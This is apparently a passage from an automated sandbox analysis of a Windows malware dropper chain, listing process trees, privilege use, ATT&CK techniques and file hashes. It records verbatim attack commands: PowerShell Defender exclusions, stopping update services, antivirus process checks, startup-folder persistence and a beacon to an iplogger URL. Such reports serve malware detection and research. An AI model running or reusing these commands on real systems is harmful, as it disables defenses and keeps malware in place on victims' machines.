Token: SeSystemEnvironmentPrivilege	3400	WMIC.exe
Token: SeRemoteShutdownPrivilege	3400	WMIC.exe
Token: SeUndockPrivilege	3400	WMIC.exe
Token: SeManageVolumePrivilege	3400	WMIC.exe
Token: 33	3400	WMIC.exe
Token: 34	3400	WMIC.exe
Token: 35	3400	WMIC.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeDebugPrivilege	3000	soft2.exe
Token: SeDebugPrivilege	2964	3321917675.exe
Token: SeDebugPrivilege	872	tasklist.exe
Token: SeDebugPrivilege	3096	tasklist.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2612	iexplore.exe
3000	soft2.exe
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4708	Voyuer.pif
4708	Voyuer.pif
4708	Voyuer.pif

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
4712	1188%E7%83%88%E7%84%B0.exe
4712	1188%E7%83%88%E7%84%B0.exe
4712	1188%E7%83%88%E7%84%B0.exe
4712	1188%E7%83%88%E7%84%B0.exe
2772	gagagggagagag.exe
2612	iexplore.exe
2612	iexplore.exe
3028	IEXPLORE.EXE
3028	IEXPLORE.EXE
3028	IEXPLORE.EXE
3028	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1984 wrote to memory of 1920	1984	4363463463464363463463463.exe	32
PID 1984 wrote to memory of 1920	1984	4363463463464363463463463.exe	32
PID 1984 wrote to memory of 1920	1984	4363463463464363463463463.exe	32
PID 1984 wrote to memory of 1920	1984	4363463463464363463463463.exe	32
PID 1984 wrote to memory of 3000	1984	4363463463464363463463463.exe	33
PID 1984 wrote to memory of 3000	1984	4363463463464363463463463.exe	33
PID 1984 wrote to memory of 3000	1984	4363463463464363463463463.exe	33
PID 1984 wrote to memory of 3000	1984	4363463463464363463463463.exe	33
PID 1984 wrote to memory of 1940	1984	4363463463464363463463463.exe	34
PID 1984 wrote to memory of 1940	1984	4363463463464363463463463.exe	34
PID 1984 wrote to memory of 1940	1984	4363463463464363463463463.exe	34
PID 1984 wrote to memory of 1940	1984	4363463463464363463463463.exe	34
PID 1984 wrote to memory of 2772	1984	4363463463464363463463463.exe	35
PID 1984 wrote to memory of 2772	1984	4363463463464363463463463.exe	35
PID 1984 wrote to memory of 2772	1984	4363463463464363463463463.exe	35
PID 1984 wrote to memory of 2772	1984	4363463463464363463463463.exe	35
PID 1984 wrote to memory of 4712	1984	4363463463464363463463463.exe	36
PID 1984 wrote to memory of 4712	1984	4363463463464363463463463.exe	36
PID 1984 wrote to memory of 4712	1984	4363463463464363463463463.exe	36
PID 1984 wrote to memory of 4712	1984	4363463463464363463463463.exe	36
PID 1920 wrote to memory of 408	1920	tdrp.exe	39
PID 1920 wrote to memory of 408	1920	tdrp.exe	39
PID 1920 wrote to memory of 408	1920	tdrp.exe	39
PID 1920 wrote to memory of 408	1920	tdrp.exe	39
PID 408 wrote to memory of 3488	408	20212.scr	40
PID 408 wrote to memory of 3488	408	20212.scr	40
PID 408 wrote to memory of 3488	408	20212.scr	40
PID 408 wrote to memory of 3488	408	20212.scr	40
PID 3488 wrote to memory of 3620	3488	sysppvrdnvs.exe	41
PID 3488 wrote to memory of 3620	3488	sysppvrdnvs.exe	41
PID 3488 wrote to memory of 3620	3488	sysppvrdnvs.exe	41
PID 3488 wrote to memory of 3620	3488	sysppvrdnvs.exe	41
PID 3488 wrote to memory of 3684	3488	sysppvrdnvs.exe	43
PID 3488 wrote to memory of 3684	3488	sysppvrdnvs.exe	43
PID 3488 wrote to memory of 3684	3488	sysppvrdnvs.exe	43
PID 3488 wrote to memory of 3684	3488	sysppvrdnvs.exe	43
PID 3620 wrote to memory of 3788	3620	cmd.exe	45
PID 3620 wrote to memory of 3788	3620	cmd.exe	45
PID 3620 wrote to memory of 3788	3620	cmd.exe	45
PID 3620 wrote to memory of 3788	3620	cmd.exe	45
PID 3684 wrote to memory of 3804	3684	cmd.exe	46
PID 3684 wrote to memory of 3804	3684	cmd.exe	46
PID 3684 wrote to memory of 3804	3684	cmd.exe	46
PID 3684 wrote to memory of 3804	3684	cmd.exe	46
PID 3684 wrote to memory of 3836	3684	cmd.exe	47
PID 3684 wrote to memory of 3836	3684	cmd.exe	47
PID 3684 wrote to memory of 3836	3684	cmd.exe	47
PID 3684 wrote to memory of 3836	3684	cmd.exe	47
PID 3684 wrote to memory of 3864	3684	cmd.exe	48
PID 3684 wrote to memory of 3864	3684	cmd.exe	48
PID 3684 wrote to memory of 3864	3684	cmd.exe	48
PID 3684 wrote to memory of 3864	3684	cmd.exe	48
PID 3684 wrote to memory of 3896	3684	cmd.exe	49
PID 3684 wrote to memory of 3896	3684	cmd.exe	49
PID 3684 wrote to memory of 3896	3684	cmd.exe	49
PID 3684 wrote to memory of 3896	3684	cmd.exe	49
PID 3684 wrote to memory of 3936	3684	cmd.exe	50
PID 3684 wrote to memory of 3936	3684	cmd.exe	50
PID 3684 wrote to memory of 3936	3684	cmd.exe	50
PID 3684 wrote to memory of 3936	3684	cmd.exe	50
PID 1984 wrote to memory of 4252	1984	4363463463464363463463463.exe	51
PID 1984 wrote to memory of 4252	1984	4363463463464363463463463.exe	51
PID 1984 wrote to memory of 4252	1984	4363463463464363463463463.exe	51
PID 1984 wrote to memory of 4252	1984	4363463463464363463463463.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	soft2.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	soft2.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Users\Admin\AppData\Local\Temp\Files\tdrp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tdrp.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\20212.scr
      "C:\Users\Admin\AppData\Local\Temp\20212.scr" /S
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:408
    - - C:\Windows\sysppvrdnvs.exe
        
        C:\Windows\sysppvrdnvs.exe
        5⤵
        Modifies security service
        Windows security bypass
        Executes dropped EXE
        Loads dropped DLL
        Windows security modification
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3488
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3788
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3684
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3804
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3836
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3864
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3896
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3936
      - C:\Users\Admin\AppData\Local\Temp\3321917675.exe
        
        C:\Users\Admin\AppData\Local\Temp\3321917675.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:1056
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:2800
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:1568
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:2848
      - C:\Users\Admin\AppData\Local\Temp\33418802.exe
        
        C:\Users\Admin\AppData\Local\Temp\33418802.exe
        6⤵
        Executes dropped EXE
        
        PID:2552
      - C:\Users\Admin\AppData\Local\Temp\1465732947.exe
        
        C:\Users\Admin\AppData\Local\Temp\1465732947.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1524
- - C:\Users\Admin\AppData\Local\Temp\Files\hiya.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hiya.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:3000
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.funletters.net/readme.htm
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2612
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3028
- - C:\Users\Admin\AppData\Local\Temp\Files\sameconcentrate.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\sameconcentrate.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1940 -s 792
      4⤵
      Loads dropped DLL
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2772
- - C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:4712
- - C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4252
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "DCRatBuild127.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1808
    - - C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2016
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:568
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 76
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2236
    - - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2008
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 88
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:3224
    - - C:\Users\Admin\AppData\Local\Temp\DCRatBuild127.exe
        
        "DCRatBuild127.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2364
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\wincrtDll\Kiq5HCXulld4.vbe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\wincrtDll\3K4aPY2c2MDUmgYCS2.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1044
- - C:\Users\Admin\AppData\Local\Temp\Files\wildfire-test-pe-file.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wildfire-test-pe-file.exe"
    3⤵
    - Executes dropped EXE
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\Files\soft2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\soft2.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook accounts
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - outlook_office_path
    - outlook_win_path
    PID:3000
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3400
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files\soft2.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4256
- - C:\Users\Admin\AppData\Local\Temp\Files\1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2012
  - - C:\Windows\sysklnorbcv.exe
      C:\Windows\sysklnorbcv.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      PID:3640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3756
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3844
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3772
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3860
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3908
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3932
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4008
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4032
- - C:\Users\Admin\AppData\Local\Temp\Files\5_6253708004881862888.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\5_6253708004881862888.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1524
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:3252
- - C:\Users\Admin\AppData\Local\Temp\Files\SoftShipment.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\SoftShipment.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4192
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Killing Killing.bat & Killing.bat
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:4480
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4796
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3096
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4700
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 10518
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3840
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BATHROOMSOFTENPAYCOMMERCIAL" Socket
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3760
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Cherry + ..\Delegation + ..\Uniprotkb + ..\Explains + ..\Www + ..\Victor c
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4660
    - - C:\Users\Admin\AppData\Local\Temp\10518\Voyuer.pif
        
        Voyuer.pif c
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4708
      - C:\Users\Admin\AppData\Local\Temp\10518\Voyuer.pif
        
        C:\Users\Admin\AppData\Local\Temp\10518\Voyuer.pif
        6⤵
        
        PID:5080
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4460
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumLink.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumCom Innovations Ltd\QuantumLink.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumLink.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:4484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
28e01bf4d046ab911ce81550e4b784a2

SHA1
10ef9e2255f3dcc76544b0f489c2b9f4be1927f0

SHA256
8ef9a9e8a6cd785768cd09c7d79b5dd902fc53a5aaf8f3e09700f94bae6bfbec

SHA512
233f9a1110566cb7fdde91df90e7f84cfc1279472dea02a013ff83736645a41fc51bf8600572dbd9007f0ca5cc1af1def603131d2e425971624d9d427f67e853

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1cdbb5643f79244f5e500dd091dc47dd

SHA1
bb0aee2df340ed558b0342c4e20c68199f953582

SHA256
a0429820996722e25e43f9f7e5ab82881d288605668c58d9bb3da50ec91b8028

SHA512
88e697b6d4cd0c16cea06294365a686a1a3b08d7611c649ea574581fec3416e90917795bf40c1ccbd02b0c6b5eb16734f2a3d7129faaac8e0175bff2997252af

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2ab86ba707b3e4007f12dfbc7d7771f3

SHA1
e589b5eaef30cc512fceb428994cdde294e07da1

SHA256
92689dc571d4fd99cbe3a2e09a169778f6192ba815994b9a13dda23af9c8c26a

SHA512
d8dd4d7f05b6e731e6ba26386c869f5e48c61ebfca1a9d2db906832f25d55fb44e475b5463277cb16565055e0c4ad0251f11ac3eaa764e0afcb6890c1c9a2c9f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
46b3f737bfb79cbe3d4bfb9c42af0e07

SHA1
405ff12989a57d5233e858d9f09cf17a59addc92

SHA256
825a10f7d524c614fb9785c8f813c981db86eba93d78827e2005cf24ce2e2d90

SHA512
954a04767840f3039b85e76fb819a7f1ed63c7a0009f71c5be88a7c751c9c3d5acc0811e73edee8c4b6c51a8a79679ce312d9a619df4c9e4b2b98cd4dc7f7229

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
82c8b81c14c6b920e1fe5f20a0d4c5d7

SHA1
847efe24a96d159a03236d6e97fa2c315b7bb6d3

SHA256
3368cdf445d88e98a8a5349b20ebead7ec50741471f623b18dc7645665bc9a27

SHA512
8ecdc3ecc8bc0687e4c0684953619b232236847b0df469ec8a601ae33a664a44b8b262ea4353ca8b99f661dea27fc86b8709527d2d5e8fa98edf0b940c803250

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a68cafae72646cd9c1f234a674d22b82

SHA1
7a61e79849928b59d0e5e02fd18a0d088e4e7368

SHA256
5cb48f2021e67eba736f2c1c21e5366b8c8fe3b4dabed1484d20a10defc9fbc7

SHA512
430d060df51407f15911ae857e70b6eb7334bd34a39a585648901ac1c9964258c0dddb3838db3cafa835cb9450f7b5bc4feed081ee55bc7450f85a93a2f7366b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
50fcb4fe0679dc07f14c1228e7b45f59

SHA1
2977dc977f166dc6da358871c17dfb338b30092f

SHA256
63e259fe66a0ddfcae48576ebd5c6c1104ca058145041a5738de11ee519e93e1

SHA512
967945fa916aae060bea6c3abe48b4b96a254e25c89dba78b09edba9d9f185e169e002f8c47edf3e701b7c07647f9780df96cef069ca6546948ffe595f712be7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
08505cca0b0837c8aa11f05412e832b4

SHA1
cdc4c180a8062878717856bb39dba31bba475a62

SHA256
4ed2658bece84cf2f64418dab7c422b195e4ca34e9552a4d4c8a8dd457f0b783

SHA512
2f56721a9de6ecdb2963bf3902b1d6631e7c4f7a42ebcc11e26cb4635d1ea439e7d3522e6295653922eae405d041a2970f1fc6109fe7ae2b8b825a7e8c0d8449

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3f1779e2f237ae4ebe19724798e0e57c

SHA1
d8dcdaa40e57f02fdd22a3ecf1e5f15f6df52c11

SHA256
20e70b30b2bd10caaac14951a5245a3bad5f5ee50936fc54abe7e1fe5251161d

SHA512
9ee39d9983da1f529544ca1881249b94c3a669b5e992e8caf774311a52492e74fd054368222a482585265dba931279a85f76ee18212cfbe1ea356db32497e6dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
49adabf1e743f5131f9217d46ebfef7b

SHA1
406ddf65b2049ba8d990ed0a345445d9b5c06796

SHA256
